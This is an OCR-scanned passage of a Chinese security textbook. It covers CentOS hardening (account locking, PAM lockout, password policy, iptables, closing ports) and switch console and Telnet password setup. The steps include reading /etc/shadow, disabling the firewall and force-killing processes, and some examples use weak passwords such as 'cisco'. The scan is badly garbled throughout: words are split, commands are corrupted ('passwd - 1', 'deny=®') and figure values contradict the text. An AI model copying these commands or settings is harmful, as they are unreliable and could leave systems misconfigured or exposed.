A. HTTP B. FTP C. Telnet D. SSL 
二 、 填 空 
SSL 协议 使 用 密 钥 体 制 进行 密 钥 协商 。 在 IIS 6. 0 中 , Web 服务 器 管理 员 
必须 先 安装 Web 站 点 证 书 , 然 后 Web 服务 器 才能 支持 SSL 会 话 。 通 常 ,数字 证 书 由 
颁发 ,其 格式 遵循 ITU-T 标准 。 
三 、 简 答题 


IIS 安全 设置 的 项 目 都 有 哪些 ? 





14.1 用 户 需 求 与 分 析 


Linux 系统 已 成 为 全 球 流行 的 Web 服务 器 平台 ,针对 Linux 系统 进行 攻击 的 黑客 也 
越 来 越 多 。 每 个 网 络 管理 员 都 将 Linux 安全 措施 作为 优先 考虑 事项 ,因此 Linux 系统 加 
固 也 成 为 保护 系统 安全 的 重要 组 成 部 分 。 


14.2 预备 知识 
性 21 常见 的 nx 操作 系统 简介 


1. Red Hat 简介 


Red Hat 是 Linux 非常 出 名 的 一 大 分 支 ,是 公共 环境 中 表现 较 出 色 的 服务 器 。 它 拥 
有 自己 的 公司 ,能 向 用 户 提供 一 套 完整 的 服务 ,这 使 得 它 特别 适合 在 公共 网 络 中 使 用 。 这 
个 版 本 的 Linux 也 使 用 新 的 内 核 , 还 拥有 大 多 数 人 都 需要 使 用 的 主体 软件 包 。 它 的 图 形 
安装 过 程 提供 简易 设置 服务 器 的 全 部 信息 。 磁 盘 分 区 过 程 可 以 自动 完成 ,还 可 以 选择 
GUI 工具 完成 ,即使 对 于 Linux 新 手 来 说 这 些 都 非常 简单 。 


2. CentOS 简介 


CentOSCCommunity Enterprise Operating System, 社 区 企业 操作 系统 ) 是 Linux 发 
行 版 之 一 , 它 来 自 Red Hat Enterprise Linux 依照 开源 代码 规定 发 行 的 源 代 码 编译 而 成 ， 
因此 有 些 要 求 高 度 稳定 性 的 服务 器 以 CentOS 代替 商业 版 的 Red Hat Enterprise Linux 
使 用 。 


3. Fedora 简介 


Fedora 是 众多 Linux 发 行 版 之 一 。 它 是 一 套 从 Red Hat Linux 发 展 出 来 的 免费 
Linux 系统 。Fedora Core 的 前 身 就 是 Red Hat Linux。 它 允许 任何 人 自由 地 使 用 、 修 改 
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和 重 发 布 , 无 论 现在 还 是 将 来 。 





4. Debian 简介 


Debian 诞生 于 1993 年 8 月 13 日 , 它 的 目标 是 提供 一 个 稳定 容错 的 Linux 版 本 。 支 
持 Debian 的 不 是 某 家 公司 ,而 是 许多 在 其 改进 过 程 中 投入 了 大 量 时 间 的 开发 人 员 ,这 种 
改进 吸取 了 早期 Linux 的 经 验 。Debian 以 其 稳定 性 著称 ,虽然 它 的 早期 版 本 Slink 有 一 
些 问题 ,但 是 它 的 现 有 版 本 Potato 已 经 相当 稳定 。 


5. Ubuntu 简介 


Ubuntu 是 一 个 以 桌面 应 用 为 主 的 Linux 操作 系统 ,基于 Debian 发 行 版 和 Unity 桌 
面 环境 ,与 Debian 的 不 同 在 于 它 每 6 个 月 会 发 布 一 个 新 版 本 。Ubuntu 的 目标 是 为 一 般 
用 户 提供 一 个 相当 稳定 的 主要 由 自由 软件 构建 而 成 的 操作 系统 。Ubuntu 具有 庞大 的 社 
区 力量 ,用 户 可 以 方便 地 从 社区 获得 帮助 。 随 着 云 计算 的 流行 ,Ubuntu 推出 了 一 个 云 计 
算 环境 搭建 的 解决 方案 ,可 以 在 其 官方 网 站 找到 相关 信息 。 


改 22 系统 加 固 的 作用 


安全 加 固 是 指 根据 专业 安全 评估 结果 制定 相应 的 系统 加 固 方案 ,针对 不 同 目标 系统 
通过 修改 安全 配置 ,增加 安全 机 制 等 方法 ,合理 进行 安全 性 加 强 ,其 主要 目的 是 消除 与 降 
低 安全 隐患 评估 与 加 固 工作 相 结 合 , 尽 可 能 避免 安全 风险 的 发 生 。 

网 络 安全 成 为 影响 系统 的 关键 问题 ,任何 系统 如 果 配 置 不 符合 安全 需求 .安全 漏洞 没 
有 及 时 修补 、 应 用 服务 和 应 用 程序 滥用 、 开 放 不 必要 的 端口 和 服务 ,都 会 遭受 黑客 的 攻击 
或 控制 ,导致 重要 资料 被 窃取 、 用 户 数据 被 自 改 、 隐 私 泄露 或 财产 损失 。 

面 对 这 样 的 安全 隐患 该 如 何 处 理 呢 ,系统 加 固 就 是 一 个 好 的 解决 方案 。 

具体 说 来 ,安全 加 固 主 要 包括 以 下 几 个 内 容 。 

(1) 系统 安全 评估 : 利用 大 量 安全 行业 的 经 验 和 漏洞 扫描 技术 与 工具 ,对 系统 进行 
全 面 评估 ,确定 系统 存在 的 安全 隐患 。 

(2) 制定 安全 加 固 方案 : 根据 前 期 系统 安全 评估 结果 制定 系统 安全 加 固 实施 方案 。 

(3) 安全 加 固 实施 : 根据 制定 的 加 固 方案 ,对 系统 进行 安全 加 固 ,并 对 加 固 后 的 系统 
进行 全 面 测试 ,确保 对 系统 业务 无 影响 ,并 达到 了 安全 提升 的 目的 。 

系统 加 固 涉 及 的 操作 非常 广泛 ,比如 正确 安装 软 硬 件 、 安 装 最 新 的 操作 系统 和 应 用 软 
件 的 安全 补丁 ,操作 系统 和 应 用 软件 的 安全 配置 、 系 统 安全 风险 防范 、 系 统 安全 风险 测试 、 
系统 账户 密码 加 固 ,关闭 多 余 服务 和 端口 等 。 

在 系统 加 固 的 过 程 中 ,如 果 加 固 失败 , 则 根据 具体 情况 ,要 么 重建 系统 ,要 么 添加 新 的 
策略 进行 加 固 。 


14.3 方案 设计 


方案 设计 如 表 14-1 所 示 。 


表 14-1 方案 设计 





[ 项 目 14 Linux 系 统 加 固 | & Be 








任务 名 称 


Linux 系统 加 固 





任务 分 解 


1. 账户 安全 设置 

(1) 检查 系统 中 的 自 建 账号 

(2) 锁定 系统 中 多 余 的 自 建 账号 

(3) 解锁 需要 恢复 的 账户 

(4) 禁用 root 之 外 的 超级 用 户 

(5) 设置 账户 锁定 次 数 和 锁定 时 间 

(6) 修改 账户 TMOUT 值 , 设 置 自动 注销 时 间 
(7) 设置 系统 密码 的 策略 

2. 防火 墙 设置 

(1) 开启 ,关闭 和 重启 防火 墙 

(2) 永久 关闭 防火 墙 和 永久 关闭 后 启用 防火 墙 
(3) 查看 防火 墙 状态 

(4) 添加 防火 墙 策略 

3. 查看 和 关闭 系统 开放 的 端口 

(1) 查看 所 有 建立 的 TCP 连接 

(2) 查看 端口 被 哪个 进程 使 用 

(3) 查看 进程 的 详细 信息 

(4) 杀 死 进程 





能 力 目标 


1. 能 设置 Linux 的 密码 策略 

. 能 设置 Linux 的 账户 锁定 策略 

.能 简单 设置 Linux 的 防火 墙 

。 能 查看 和 关闭 Linux 系统 开放 的 服务 和 端口 





知识 目标 


.了解 Linux 系统 的 常见 版 本 
. 了 解 系统 加 固 的 作用 





素质 目标 





树立 较 强 的 安全 意识 

. 掌握 网 络 安全 行业 的 基本 情况 

. 培养 职业 兴趣 ,能 爱 岗 敬 业 、 热 情 主动 的 工作 态度 
培养 良好 的 职业 道德 

. 具有 可 持续 发 展 能 力 


中 





14.4 项 目 实 施 


妇 41 任务 1: 账户 安全 设置 


1. 任务 目标 


设置 Linux 系统 中 的 账户 安全 。 
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2. 工作 任务 


(1) 检查 系统 中 的 自 建 账号 。 

(2) 锁定 系统 中 多 余 的 自 建 账号 。 

(3) 解锁 需要 恢复 的 账户 。 

(4) 禁用 root 之 外 的 超级 用 户 。 

(5) 设置 账户 锁定 次 数 和 锁定 时 间 。 

(6) 修改 账户 TMOUT 值 ,设置 自动 注销 时 间 。 
(7) 设置 系统 密码 的 策略 。 


3. 工作 环境 

一 台 预 装 CentOS 的 主机 。 

4. 实施 过 程 

(1) 使 用 下 列 命令 检查 系统 中 的 自 建 账户 。 


[root@1localhost 一 ]# cat /etc/passwd 
[root@1localhost 一 ] # cat /etc/shadow 


(2) 使 用 下 列 命令 锁定 系统 中 多 余 的 自 建 账 户 。 


[root@localhost 一 ]# passwd - 1 guolin 
锁定 用 户 guolin 的 密码 。 
passwd: 操作 成 功 


(3) 使 用 下 列 命令 解锁 需要 恢复 的 账户 。 


[root@1localhost 一 ]# passwd -u guolin 
解锁 用 户 guolin 的 密码 。 
passwd: 操作 成 功 


(4) 禁用 root 之 外 的 超级 用 户 。 
Q@ 使 用 下 列 命令 查看 口令 文件 。 


[root@1localhost ~]# cat /etc/passwd 

@ 使 用 下 列 命 令 对 口令 文件 进行 备份 。 
[root@1localhost ~]# cp - p /etc/passwd /etc/passwd. bak 
G 使 用 下 列 命令 锁定 不 必要 的 超级 账户 。 


[root@1localhost 一 ]# passwd —1 guolin 
锁定 用 户 guolin 的 密码 。 
passwd: 操作 成 功 
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@@ 使 用 下 列 命令 解锁 需要 恢复 的 超级 账户 。 


[root@1localhost ~]# passwd - u guolin 


解锁 用 户 guolin 的 密码 。 
passwd: 操作 成 功 


(5) 设置 账户 锁定 次 数 和 锁定 时 间 。 
Q@ 使 用 下 列 命令 查看 账户 锁定 策略 文件 。 


[root@1localhost ~ ]# cat /etc/pam. d/system - auth 
@ 使 用 下 列 命 令 对 账户 锁定 策略 文件 进行 备份 。 
[root@1localhost ~]# cp - p /etc/pam. d/system - auth /etc/pam. d/system - auth. bak 


@ 使 用 下 列 命令 对 账户 锁定 策略 文件 进行 修改 。 


[root@1localhost 一 ]# vi /etc/pam. d/system - auth 


@ 设置 为 密码 连续 输 错 5 次 锁定 ,锁定 时 间 为 300 秒 ,如 图 14-1 所 示 。 














#¥ This file 1s auto- generated. 
# User changes will be destroyed the next time authconfig is run. 
auth required pam_env. so 
auth sufficient pam_fprintd. so 
auth sufficient pam_unix.so nullok try_first pass 
auth requisite pam_succeed if.so uid >=1000 quiet _ success 
auth required pam_deny. so 
auth required pam tally so onerr=fail deny=® unlock time=300 
account required pam_unix. so 
account sufficient pam_localuser. so 
account sufficient pam_succeed if.so uid < 1000 quiet 
account required pam permit.so 
图 14-1 设置 密码 输 错 次 数 及 锁定 时 间 


加 使 用 下 列 命令 恢复 账户 锁定 策略 。 


[root@1localhost ~]# cp - p /etc/pam. d/ system - auth. bak /etc/pam. d/system — auth 
cp: 是 否 覆盖 "/etc/pam. d/system 一 auth"? y 

@ 使 用 faillog -u (用 户 名 ) -r 命令 对 用 户 解锁 。 

(6) 修改 账户 TMOUT 值 , 设 置 自动 注销 时 间 。 

Q@ 使 用 下 列 命令 有 无 TMOUT 设置 。 


[root@1localhost 一 ]# cat /etc/profile 


@ 使 用 下 列 命令 进行 备份 。 


[root@1localhost ~]# cp -p /etc/profile /etc/profile. bak 
@ 使 用 下 列 命令 对 文件 进行 修改 。 


[root@1localhost ~]# vi /etc/profile 
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@ 设置 “无 操作 600 秒 后 自动 退出 ”的 命令 ,如 图 14-2 所 示 。 


# /etc/profile 





# System wide environment and startup programs, for login setup 
# Functions and aliases go in /etc/bashrc 


本 It's NOT a good idea to change this file unless you know what you 
上 Ware doing. It's much better to create a custom.sh shell script in 
I# /etc/profile.d/ to make custom changes to your environment, as this 
# will prevent the need for merging in future updates. 

TMOUT=600 轩 














14-2 设置 无 操作 自动 退出 时 间 
@ 使 用 下 列 命令 恢复 账户 锁定 策略 。 


[root@1localhost ~]# cp ~-p /etc/profile.bak /etc/profile 
cp: 是 否 覆盖 "/etc/profile"? y 


(7) 设置 系统 的 密码 策略 。 
Q@ 查看 系统 设置 的 密码 策略 ,如 图 14-3 所 示 。 


[root@localhost “J# cat /etc/login.deTfs [grep PASS 
PASS MAX DAYS Maximum number of days a password may be used. 
PASS MIN DAYS Minimum number of days allowed between password changes 
PASS_MIN_LEN Minimum acceptable password Length. 
PASS_WARN_AGE Number of days warning given before a password expires. 
ASS_MAX_DAYS 95999 
ASS_MIN_DAYS 0 
ASS MIN LEN 5 
ASS WARN AGE 7 











图 14-3 查看 系统 设置 的 密码 策略 
@ 使 用 下 列 命 令 进行 策略 备份 。 
[root@localhost ~]# cp ~-p /etc/login.defs /etc/login. defs. bak 
@@ 使 用 vi 命令 修改 配置 文件 。 
[root@1localhost ~]# vi /etc/login. defs 


@ 设置 新 建 用 户 的 密码 最 长 使 用 天 数 是 90, 新 建 用 户 的 密码 最 短 使 用 天 数 是 0, 新 
建 用 户 的 密码 到 期 提前 提醒 天 数 是 7, 最 小 密码 长 度 是 9, 如 图 14-4 所 示 。 





Password aging controls: 


加 
品 
地 PASS_MAX_DAYS Maximum number of days a password may be used. 

地 PASS_MIN_DAYS Minimum number of days allowed between password changes. 
必 PASS_MIN_LEN Minimum acceptable password length. 

# PASS WARN AGE Number of days warning given before a password expires. 
地 
PASS_MAX_DAYS 9 
PASS_MIN_DAYS 0 
PASS MIN LEN 7 
PASS WARN AGE 9 


0 











图 14-4 设置 用 户 密码 使 用 期 限 及 长 度 限制 








@@ 使 用 下 列 命令 恢复 系统 密码 策略 。 
[root@1localhost ~]# cp -~p /etc/login.defs.bak /etc/login.defs 


cp: 是 否 覆盖 "/etc/login.defs"? y 


改 42 任务 2: 防火 墙 设置 
1. 任务 目标 
设置 Linux 系统 的 防火 墙 安 全 。 
2. 工作 任务 


(1) 开启 ,关闭 和 重启 防火 墙 。 

(2) 永久 关闭 防火 墙 和 永久 关闭 后 启用 防火 墙 。 
(3) 查看 防火 墙 状态 。 

(4) 添加 防火 墙 策 略 。 


3. 工作 环境 

一 台 预 装 CentOS 的 主机 。 

4. 实施 过 程 

(1) 开启 ,关闭 和 重启 防火 墙 。 
@ 使 用 下 列 命令 开启 防火 墙 。 


[root@1localhost ~]# service iptables start 
Redirecting to /bin/systemct1l start iptables. service 


@ 使 用 下 列 命令 关闭 防火 墙 。 


[root@1localhost ~ ]# service iptables stop 
Redirecting to /bin/systemct1 stop iptables. service 


@ 使 用 下 列 命令 重启 防火 墙 。 


[root@1localhost ~ ]# service iptables restart 
Redirecting to /bin/systemct] restart iptables. service 


(2) 永久 关闭 防火 墙 和 永久 关闭 后 启用 防火 墙 。 
@ 使 用 下 列 命令 永久 关闭 防火 墙 。 


[root@1localhost ~ ]# chkconfig iptables off 


注意 : 正在 将 请 求 转 发 到 “systemctl disable iptables. service”。 
@ 使 用 下 列 命令 永久 关闭 后 启用 防火 墙 。 


[root@1localhost ~]# chkconfig iptables on 
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注意 : 正在 将 请 求 转发 到 “systemctl enable iptables. service”。 
(3) 查看 防火 墙 状态 ,如 图 14-5 所 示 。 


root@localhost “]# service iptables status 
ledirecting to /bin/systemctl status iptables.service 
iptables. service - IPv4 firewall with iptables 
Loaded: loaded (/usr/\lib/systemd/system/iptables. service; disabled) 
Active: active (exited) since — 2017-04-17 16:20:03 CST; 2min 37s ago 
Process: 8351 ExecStop=/usr/\ibexec/iptables/iptables. init stop (code=exited, 
tatus=0/SUCCESS) 
Process: 8431 ExecStart=/usr/libexec/iptables/iptables. init start (code=exited 
status=0/SUCCESS) 
Main PID: 8431 (code=exited, status=0/SUCCESS) 














图 14-5 查看 防火 墙 状 态 


(4) 添加 防火 墙 策 略 。 
@ 使 用 vi 命令 编辑 /etc/sysconfig/iptables 文件 。 


[root@1localhost ~ ]# vi /etc/sysconfig/iptables 


@ 在 文件 中 添加 策略 ,以 添加 8080 端口 和 9990 端口 ,如 图 14-6 所 示 。 


root@localhost:~ 
文件 (F) 编辑 (E) 查看 (V) 搜索 (5) 终端 (T) 帮助 (H) 


# sample configuration for iptables service 

# you can edit this manually or use system- config- firewall 

# please do not ask us to add additional ports/services to this default 
configuration 

#filter 

: INPUT ACCEPT [0:0] 

:FORWARD ACCEPT [0:0] 

: OUTPUT ACCEPT [0:0] 

-A INPUT -m state -- state RELATED,ESTABLISHED -j ACCEPT 

-A INPUT -p icmp -j ACCEPT 

-A INPUT -i lo -j ACCEPT 

-A INPUT -m state --state NEW -m tcp -p tcp -- dport 8080 -j ACCEPT 
-A INPUT -m state -- state NEW -m tcp -p tcp -- dport 9990 -j ACCEPT 
-A INPUT -p tcp -m state --state NEW -m tcp -- dport 22 -j ACCEPT 
-A INPUT -j REJECT -- reject- with icmp- host- prohibited 

-A FORWARD -j REJECT -- reject- with icmp- host- prohibited 

COMMI 回 











图 14-6 添加 端口 8080 和 9990 


@ 保存 /etc/sysconfig/iptables 文件 ,并 使 用 下 列 命令 重启 防火 墙 。 


[root@1localhost 一 ]# service iptables restart 
Redirecting to /bin/systemctl] restart iptables. service 


@ 重新 查看 防火 墙 状态 ,如 图 14-7 所 示 。 


[ root@localhost “]# service iptables status 
Redirecting to /bin/systemctl status iptables.service 
liptables. service - IPv4 firewall with iptables 
Loaded: loaded (/usr/lib/systemd/system/iptables. service; enabled) 
Active: active (exited) since 一 2017-04-17 16: 45:04 CST; 54s ago 
Process: 8923 ExecStop=/usr/libexec/iptables/iptables. init stop (code: 
lexited, status=0/SUCCESS) 
Process: 8931 ExecStart=/usr/\libexec/iptables/iptables. init start (cod 
le=exited, status=0/SUCCESS) 
Main PID: 8931 (code=exited, status=0/SUCCESS) 


图 14-7 重新 查看 防火 墙 状态 











性 43 任务 3: 查看 和 关闭 系统 开放 的 端口 


1. 任务 目标 


查看 和 关闭 系统 开放 的 端口 。 


2. 工作 任务 


(1) 查看 所 有 建立 的 TCP 连接 。 
(2) 查看 端口 被 哪个 进程 使 用 。 
(3) 查看 进程 的 详细 信息 。 


(4) 杀 死 进程 。 
3. 工作 环境 


一 台 预 装 CentOS 的 主机 。 


4. 实施 过 程 


(1) 查看 所 有 建立 的 TCP 连接 ,如 图 14-8 所 示 。 
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root®Llocalhost 


下 netstat - antp 


ctive Internet connections (servers and established) 























roto Recv-Q Send- Q Local Address Foreign Address State PID/Program 7 
Rcp 0 127.0.0.1:25 0.0.0.0:# LISTEN 1594/master 
上 cp 0 0.0.0.0:32936 0.0.0.0:# LISTEN 1489/rpc. stat 
也 0 0.0.0.0:111 0.0.0.0:# LISTEN 1481 /rpcbind 

cp 0 0.0.0.0:22 0.0.0.0:# LISTEN 1480/sshd 
上 cp 0 127.0.0.1:631 0.0.0.0:# LISTEN 2145/cupsd 
kcp6 0 HL LISTEN 1594/master 
上 cp5 0 人 LISTEN 1489/ rpc.stal 
ke 0 LISTEN 1481/ rpcbind 
kcp6 0 LISTEN 1480/sshd 

cp6 0 四 LISTEN 2145/cupsd 

图 14-8 ”查看 所 有 建立 的 TCP 连接 

(2) 使 用 下 列 命 令 查看 88 端口 正在 被 哪个 进程 使 用 ,如 图 14-9 所 示 。 

root®localhost “|# netstat -tnp [grep Hi 
bnix 2 [ acc] LISTENING 24380 1885/dbus-daemon B®/tmp/dbus-3cvBhHKduK 
bnix 2 | Acc ] LISTENING = 21288 1594/master private/bounce 
bnix 2 [Lacc] LISTENING 36882 3311/ssh- agent /tmp/ssh- 86x25keBXtDr/agent. 314: 











14-9 查看 使 用 88 端口 的 进程 


(3) 查看 进程 1594 的 详细 信息 ,如 图 14-10 所 示 。 


(4) 杀 死 进程 。 
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[root@locathost “]# ps 1594 
PID TITY STAT TIME COMMAND 
1594 ? Ss 0:00 /usr/libexec/postfix/master - 








图 14-10 查看 进程 1594 的 详细 信息 
Q@ 使 用 下 列 命 令 杀 死 进 程 。 
[root@localhost ~ ]# kill -9 1594 
@ 再 使 用 命令 查看 该 端口 是 否 开 放 , 发 现 随 着 进程 被 杀 死 ,对 应 的 端口 也 关闭 了 ,如 
图 14-11 所 示 。 


TaotBLocaUTosE IH notstat -np Torep Se 
unix 2 [A STREAM LISTENING 24380 1885 /dbus- daemon @®/tmp/dbus- 3cvBhHKduK 
lunix 2 [acc] STREAM LISTENING 36882 3311 /ssh- agent tmp/ssh- 8Gx25keBXtDr/agent. 314: 


图 14-11 进程 被 杀 死 后 ,对 应 的 端口 也 关闭 了 











14.5 常见 问题 解答 


本 项 目 实施 使 用 的 是 哪个 Linux 发 行 版 本 ? 为 什么 使 用 这 个 版 本 ? 

答 : CentOS。 原 因 如 下 : 国内 多 数 企业 使 用 RHEL 搭建 服务 器 ; 目前 使 用 CentOS 
的 企业 越 来 越 多 ;CentOS 和 RHEL 几乎 一 样 ,而 且 CentOS 有 免费 的 yum 工具 可 以 使 
用 ; CentOS 目前 已 经 加 入 Red Hat 公司 , 且 依 然 免费 。 


14.6 认证 试题 


简 答题 


1. Linux 系统 有 哪些 较为 知名 的 版 本 。 
2. 简 述 系统 加 固 的 作用 。 





企业 网 中 主要 网 络 设备 的 安全 设置 


本 学 习 情 境 主 要 介绍 企业 网 中 主要 网 络 设 备 的 安全 配置 以 及 主流 网 络 安全 设备 配置 
和 管理 ,包括 交换 机 、 路 由 器 、 网 络 防火 墙 \ 入 侵 检 测 系统 IDS、VPN 服务 器 等 产品 的 基本 
配置 ,基本 界面 和 功能 配置 。 通 过 6 个 项 目的 训练 ,掌握 最 常用 网 络 设备 交换 机 和 路 由 器 
的 安全 配置 ; 掌握 AAA 配置 .熟悉 防火 墙 的 部 署 与 配置 以 及 利用 入 侵 检测 系统 IDS 进 
行事 件 查 询 和 报表 查看 的 方法 ; 能 正确 配置 VPN 服务 器 ,并 采用 正确 的 方法 对 VPN 连 
接 结果 进行 检查 。 

通过 本 学 习 情 境 所 有 项 目的 实践 ,可 以 学 会 如 何 对 企业 网 网 络 设备 进行 安全 部 署 , 解 
决 网 络 安全 设备 配置 中 遇 到 的 问题 。 

本 学 习 情境 需要 完成 的 项 目 有 : 

项 目 15 企业 网 中 二 层 网 络 设备 的 安全 设置 

项 目 16 企业 网 中 三 层 网 络 设备 的 安全 设置 

项 目 17 AAA 部 署 与 配置 

项 目 18 防火 墙 的 配置 与 应 用 

项 目 19 入 侵 检测 系统 的 部 署 与 配置 

项 目 20 VPN 服务 器 的 配置 与 管理 


15.1 用 户 需 求 与 分 析 


在 局 域 网 安全 架构 中 ,二 层 网 络 设 备 交 换 机 安全 是 非常 重要 的 ,在 整个 内 网 安全 体系 
中 起 决定 性 的 作用 。 交 换 机 的 主要 功能 是 提供 网 络 数据 包 优化 和 转发 ,存在 被 攻击 或 人 
侵 的 危险 。 一 旦 入 侵 者 得 到 交换 机 的 控制 权限 ,所 有 通过 该 交换 机 转发 的 数据 包 都 将 受 
到 威胁 。 通 常情 况 下 ,网 络 安 全 管理 员 可 以 通过 配置 端口 传输 控制 ,端口 验证 ,ARP 检 
测 ,创建 VLAN 等 措施 加 强 交 换 机 的 安全 性 。 

当 端 口 收 到 大 量 的 广播 , 单 播 或 多 播 包 时 ,就 会 发 生 广播 风暴 ,转发 这 些 包 将 导致 网 
络 速度 变 慢 或 超时 。 借 助 对 端口 传输 控制 的 配置 , 既 可 以 有 效 杜绝 广播 风暴 对 整个 网 络 
的 冲击 ,有 效 避 免 硬 件 损坏 或 链 路 故障 而 导致 的 网 络 瘫 痪 ,从 而 保证 网 络 的 正常 通信 。 默 
认 情 况 下 ,广播 .多 播 和 单 播 风暴 控制 被 禁用 ,需要 时 可 将 其 开启 。 流 控制 只 适用 于 
1000BASE-T、1000BASE-SX、10GBASE-FX 和 GBIC 端口 。 在 千 兆 端口 启用 流 控 制 后 ， 
可 以 在 拥塞 期 间 和 暂停 其 他 终端 的 连接 。 当 本 地 设备 发 现任 何 终端 发 生 拥塞 时 ,将 发 送 一 
个 暂停 帧 ,以 通知 其 连接 伙伴 或 远 端 拥塞 设备 。 当 收 到 暂停 帧 后 ,远程 设备 将 停止 发 送 任 
何 数据 包 , 以 防止 在 拥塞 期 内 丢失 任何 数据 包 。 当 端口 处 于 拥塞 状态 ,无 法 接收 到 数据 流 
时 ,将 通知 其 他 端口 暂停 发 送 , 直 到 恢复 正常 状态 。 目 前 大 多 数 局 域 网 中 都 配 有 三 层 交 换 
机 ,安全 功能 非常 丰富 ,通过 合理 配置 , 即 可 与 网 络 防 火 墙 协同 工作 ,成 为 网 络 安全 的 又 一 
道 屏 障 。 拒 绝 未 被 授权 的 计算 机 接 人 网 络 ,或 者 限制 某 个 端口 接 和 人 计算 机 的 数量 ,从 而 保 
证 网 络 的 接 入 安全 ,避免 网 络 被 个 别 用 户 滥用 。 


15.2 预备 知识 


全 21 保护 交换 机 设备 本 地 登录 安全 

交换 机 在 企业 内 网 中 占有 重要 地 位 ,通常 是 整个 网 络 的 核心 所 在 。 在 一 个 交换 网 络 
中 ,如 何 过 滤 办 公 网 内 部 的 用 户 通 信 ,保障 安全 有 效 的 数据 转发 ?如 何 阻 挡 非法 用 户 , 保 
障 网 络 安全 应 用 ? 如 何 进行 安全 网 管 ,及 时 发 现 网 络 非法 用 户 ,非法 行为 及 远程 网 管 信 息 
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的 安全 性 ? 这些 都 是 构建 网 络 需要 首先 考虑 的 问题 。 

交换 机 是 企业 网 中 直接 连接 终端 设备 的 重要 网 络 互 联 设 备 ,在 网 络 中 承担 终端 设备 
的 接 入 功能 。 交 换 机 的 控制 台 在 默认 情况 下 没有 密码 ,如 果 网 络 中 有 非法 用 户 连 接 到 交 
换 机 的 控制 端口 ,就 可 以 像 管理 员 一 样 任意 自 改 交换 机 的 配置 ,从 而 给 计算 机 带 来 网 络 安 
全 隐患 。 从 保护 网 络 安 全 的 角度 考虑 ,所 有 交换 机 的 控制 台 都 应 当 根 据 用 户 不 同 的 管理 
权限 ,配置 不 同 的 特权 访问 权限 。 

为 保护 网 络 安全 ,需要 给 交换 机 配置 管理 密码 ,以 禁止 非 授 权 用 户 的 访问 。 只 需要 一 
根 配置 线 缆 一 端 连接 到 交换 机 的 配置 端口 (Console 口 ) , 另 一 端 连接 到 配置 计算 机 的 串 
口 (COM 口 ) 或 者 USB 接口 (需要 一 条 COM 转 USB 线 , 并 安装 相应 的 驱动 即 可 ) 。 

通过 如 下 命令 ,将 登录 交换 机 控制 台 的 特权 密码 设置 为 cisco。 

Switch > enable 

Switch# configure terminal 


Switch(config) # enable secret level 15 0 cisco //15 表示 密码 使 用 特权 级 别 ,0 表示 输入 明文 
// 形 式 密 码 ,1 表示 输入 密 文 形式 密码 


注意 : 在 配置 模式 下 ,使 用 no enable secret 命令 可 以 清除 以 上 设置 的 密码 。 
全 22 保护 交换 机 设备 远程 登录 安全 


除了 通过 Console 端口 与 设备 串口 相连 管理 设备 外 ,还 可 以 通过 Telnet 程序 使 用 交换 
机 的 RJ-45 端口 远程 登录 交换 机 管理 设备 。 配 置 交换 机 远程 登录 密码 的 操作 步骤 如 下 。 


1. 配置 交换 机 远程 登录 地 址 


交换 机 的 管理 IP 地 址 一 般 是 加 载 到 交换 机 的 管理 中 心 VLAN 1 上 ,如 果 管 理 的 计 
算 机 在 其 他 VLAN 中 ,可 以 给 其 他 VLAN 配置 合适 的 管理 地 址 。 


Switch> enable 

Switch# configure terminal 

Switch(config) # interface vlan 1 

Switch(config - if) # no shutdown 

Switch(config- 证 ) # ip address 192.168.1.1 255.255.255.0 // 配 置 远程 登录 交换 机 的 管理 地 址 


2. 配置 交换 机 的 登录 密码 


Switch# configure terminal 

Switch(config) # enable secret level 1 0 xxxx  // 配 置 远程 登录 密码 

Switch(config)# enable secret level 15 0 #xxx 

// 配 置 进 入 特权 模式 的 密码 ,其 中 level 1 表示 密码 所 使 用 的 特权 级 别 ,0 表示 输入 的 是 明文 形式 密码 


3. 启动 交换 机 的 远程 登录 线程 密码 


Switch# config terminal 

Switch(config) # enable password xx#xx ”// 设 置 进入 特权 模式 的 密码 

Switch(config - line) #password x**x* // 设 置 通过 Cosole 端口 连接 设备 及 Telnet 远程 登录 时 
// 所 需 的 密码 








Switch(config) # line console 0 
Switch(config- line)#password *xxx  // 设 置 通过 Cosole 端口 连接 设备 的 密码 
Switch(config— line)# login 


Switch(config)#1ine vty0 4 // 启 动 线程 
Switch(config— if) #password cisco // 配 置 Telnet 远程 登录 的 密码 
Switch(config— if) #1login // 激 活 线程 


注意 : 在 配置 模式 下 ,使 用 no enable secret 或 no enable password 命令 可 以 清除 以 
上 设置 的 控制 台 登 录 密 码 和 进入 特权 模式 密码 。 


伍 23 交换 机 端口 安全 概述 


利用 交换 机 端口 安全 的 特性 ,可 以 实现 网 络 接 入 的 安全 性 ,具体 可 以 通过 限制 允许 访 
问 交换 机 上 某 个 端口 的 MAC 地址 以 及 IP 地 址 来 实现 严格 控制 对 该 端口 的 输入 。 当 为 
安全 端口 配置 了 安全 地 址 后 ,除了 源 地 址 为 这 些 安全 地 址 转发 数据 包 外 ,这 个 端口 将 不 转 
发 其 他 任何 包 。 此 外 还 可 以 限制 一 个 端口 上 能 包含 的 安全 地 址 的 最 大 数目 。 如 果 将 最 大 
数目 设置 为 1 ,并 且 为 该 端口 配置 一 个 安全 地 址 , 则 连接 到 这 个 端口 的 计算 机 将 独 享 该 端 
口 的 全 部 带宽 。 

为 了 增强 安全 性 ,可 以 将 MAC 地 址 和 下 地 址 绑 定 起 来 作为 安全 地 址 ,也 可 以 只 
限定 MAC 地 址 而 不 绑 定 IP 地 址 。 在 交换 机 端口 上 绑 定 MAC 地 址 的 方法 有 以 下 
两 种 。 

(1) 手动 配置 安全 MAC 地 址 。 在 交换 机 的 端口 的 配置 模式 下 使 用 命令 switchport 
port-security mac-address mac-address[ip-address ip-address] 来 手工 配置 交换 机 端口 的 
安全 地 址 。 

(2) 黏 滞 安全 MAC 地 址 。 让 交换 机 端口 自动 学 习 MAC 地 址 ,选择 交换 机 端口 连接 
的 任意 一 台 主 机 Ping 交换 机 其 他 端口 连接 主机 的 IP 地 址 ,然后 在 交换 机 的 特权 模式 下 
使 用 命令 show mac-address-table 查看 交换 机 端口 学 习 到 MAC 地 址 ,此 时 学 习 类 型 为 
DYNAMIC。 如 果 在 交换 机 的 端口 启用 安全 模式 并 执行 命令 switchport port-security 
mac-address sticky 后 ,在 该 端口 连接 的 任意 一 台 主 机 上 Ping 交换 机 其 他 端口 连接 的 主 
机 (IP 地 址 )。 然 后 在 交换 机 的 特权 模式 下 使 用 命令 show mac-address-table 查看 交换 机 
端口 学 习 到 MAC 地 址 ,此 时 学 习 类 型 为 STATIC. 交 换 机 将 所 有 端口 自动 学 习 到 的 
